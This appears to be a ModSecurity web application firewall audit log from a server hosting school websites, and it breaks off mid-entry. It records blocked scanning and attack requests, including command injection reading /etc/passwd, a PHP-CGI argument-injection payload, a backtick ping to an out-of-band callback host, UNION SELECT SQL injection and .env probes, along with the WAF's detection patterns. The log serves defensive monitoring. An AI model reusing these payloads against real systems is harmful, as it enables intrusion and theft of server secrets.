Engine-Mode: "ENABLED" --7e617266-Z-- --dba77f40-A-- [21/May/2025:09:14:32 +0700] aC03CIv3pT1iV0OxjLTnMwAAAI8 103.236.140.4 40546 103.236.140.4 8181 --dba77f40-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 167545247 --dba77f40-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dba77f40-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747793672139730 1924 (- - -) Stopwatch2: 1747793672139730 1924; combined=847, p1=326, p2=492, p3=0, p4=0, p5=29, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dba77f40-Z-- --a6aa4268-A-- [21/May/2025:09:14:33 +0700] aC03CYv3pT1iV0OxjLTnNgAAAIM 103.236.140.4 40556 103.236.140.4 8181 --a6aa4268-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3 Accept: */* Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 164788153 --a6aa4268-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a6aa4268-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747793673110005 2658 (- - -) Stopwatch2: 1747793673110005 2658; combined=1409, p1=404, p2=979, p3=0, p4=0, p5=26, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6aa4268-Z-- --cfa4047b-A-- [21/May/2025:09:31:15 +0700] aC068xpv_mIXt2pDBOoHAAAAAME 103.236.140.4 40702 103.236.140.4 8181 --cfa4047b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.131.13.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.131.13.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cfa4047b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfa4047b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747794675937099 3173 (- - -) Stopwatch2: 1747794675937099 3173; combined=1334, p1=464, p2=834, p3=0, p4=0, p5=36, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfa4047b-Z-- --787dd925-A-- [21/May/2025:09:32:41 +0700] aC07SYv3pT1iV0OxjLTnXAAAAJA 103.236.140.4 40706 103.236.140.4 8181 --787dd925-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 75.119.193.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 75.119.193.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --787dd925-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --787dd925-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747794761421523 2987 (- - -) Stopwatch2: 1747794761421523 2987; combined=1325, p1=451, p2=843, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --787dd925-Z-- --a6b2db14-A-- [21/May/2025:09:46:08 +0700] aC0-cIv3pT1iV0OxjLTnZQAAAIQ 103.236.140.4 40754 103.236.140.4 8181 --a6b2db14-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --a6b2db14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6b2db14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747795568460783 865 (- - -) Stopwatch2: 1747795568460783 865; combined=326, p1=292, p2=0, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6b2db14-Z-- --0acf8f72-A-- [21/May/2025:09:46:08 +0700] aC0-cIv3pT1iV0OxjLTnZgAAAIg 103.236.140.4 40758 103.236.140.4 8181 --0acf8f72-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0acf8f72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0acf8f72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747795568556287 643 (- - -) Stopwatch2: 1747795568556287 643; combined=242, p1=214, p2=0, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0acf8f72-Z-- --e7dd866a-A-- [21/May/2025:09:46:08 +0700] aC0-cIv3pT1iV0OxjLTnaAAAAIk 103.236.140.4 40762 103.236.140.4 8181 --e7dd866a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --e7dd866a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7dd866a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747795568851141 698 (- - -) Stopwatch2: 1747795568851141 698; combined=279, p1=251, p2=0, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7dd866a-Z-- --45546657-A-- [21/May/2025:09:51:13 +0700] aC0_oYv3pT1iV0OxjLTnbAAAAJA 103.236.140.4 40778 103.236.140.4 8181 --45546657-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: uid=1234123 X-Varnish: 164788219 --45546657-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --45546657-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45546657-E-- --45546657-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747795873136028 1797 (- - -) Stopwatch2: 1747795873136028 1797; combined=588, p1=380, p2=180, p3=0, p4=0, p5=28, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45546657-Z-- --d3fe0e1f-A-- [21/May/2025:09:54:28 +0700] aC1AZCioYDAgD0WHUjSnSwAAAEs 103.236.140.4 40802 103.236.140.4 8181 --d3fe0e1f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 150.242.85.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 150.242.85.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d3fe0e1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3fe0e1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747796068370242 3242 (- - -) Stopwatch2: 1747796068370242 3242; combined=1299, p1=444, p2=825, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3fe0e1f-Z-- --5ea8e028-A-- [21/May/2025:10:21:58 +0700] aC1G1ov3pT1iV0OxjLTnjwAAAJI 103.236.140.4 41010 103.236.140.4 8181 --5ea8e028-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --5ea8e028-C-- --5ea8e028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ea8e028-E-- --5ea8e028-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747797718125192 4045 (- - -) Stopwatch2: 1747797718125192 4045; combined=2149, p1=520, p2=1586, p3=0, p4=0, p5=42, sr=91, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ea8e028-Z-- --eae8150a-A-- [21/May/2025:10:34:54 +0700] aC1J3ov3pT1iV0OxjLTnnQAAAJM 103.236.140.4 41066 103.236.140.4 8181 --eae8150a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.250.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.250.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eae8150a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eae8150a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747798494701517 3304 (- - -) Stopwatch2: 1747798494701517 3304; combined=1427, p1=517, p2=879, p3=0, p4=0, p5=30, sr=147, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eae8150a-Z-- --bb814d2f-A-- [21/May/2025:10:38:05 +0700] aC1KnYv3pT1iV0OxjLTnogAAAIY 103.236.140.4 41090 103.236.140.4 8181 --bb814d2f-B-- GET /card_scan.php?No=30&ReaderNo=%60ping%20d0mbkqa4kqtm561jt3n0mxrugr85gnoga.oast.fun%60 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 164788331 --bb814d2f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bb814d2f-E-- --bb814d2f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: `ping found within ARGS:ReaderNo: `ping d0mbkqa4kqtm561jt3n0mxrugr85gnoga.oast.fun`"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747798685557691 2446 (- - -) Stopwatch2: 1747798685557691 2446; combined=681, p1=486, p2=163, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb814d2f-Z-- --34f4bf75-A-- [21/May/2025:10:38:05 +0700] aC1KnYv3pT1iV0OxjLTnowAAAIU 103.236.140.4 41090 103.236.140.4 8181 --34f4bf75-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 167545424 --34f4bf75-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --34f4bf75-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34f4bf75-E-- --34f4bf75-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1747798685588379 3465 (- - -) Stopwatch2: 1747798685588379 3465; combined=1912, p1=422, p2=1460, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34f4bf75-Z-- --5e9dfe0d-A-- [21/May/2025:10:48:58 +0700] aC1NKiioYDAgD0WHUjSnXAAAAFI 103.236.140.4 41232 103.236.140.4 8181 --5e9dfe0d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.24.142.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.24.142.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5e9dfe0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e9dfe0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747799338600878 3155 (- - -) Stopwatch2: 1747799338600878 3155; combined=1326, p1=468, p2=828, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e9dfe0d-Z-- --af59a963-A-- [21/May/2025:10:49:47 +0700] aC1NWyioYDAgD0WHUjSnYAAAAEA 103.236.140.4 41244 103.236.140.4 8181 --af59a963-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 Accept-Charset: utf-8 --af59a963-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af59a963-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747799387048613 832 (- - -) Stopwatch2: 1747799387048613 832; combined=334, p1=291, p2=0, p3=0, p4=0, p5=43, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af59a963-Z-- --8f11f942-A-- [21/May/2025:10:59:56 +0700] aC1PvHZGSt58M5vv3glyngAAABI 103.236.140.4 41300 103.236.140.4 8181 --8f11f942-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.245.236.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.245.236.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8f11f942-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f11f942-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information 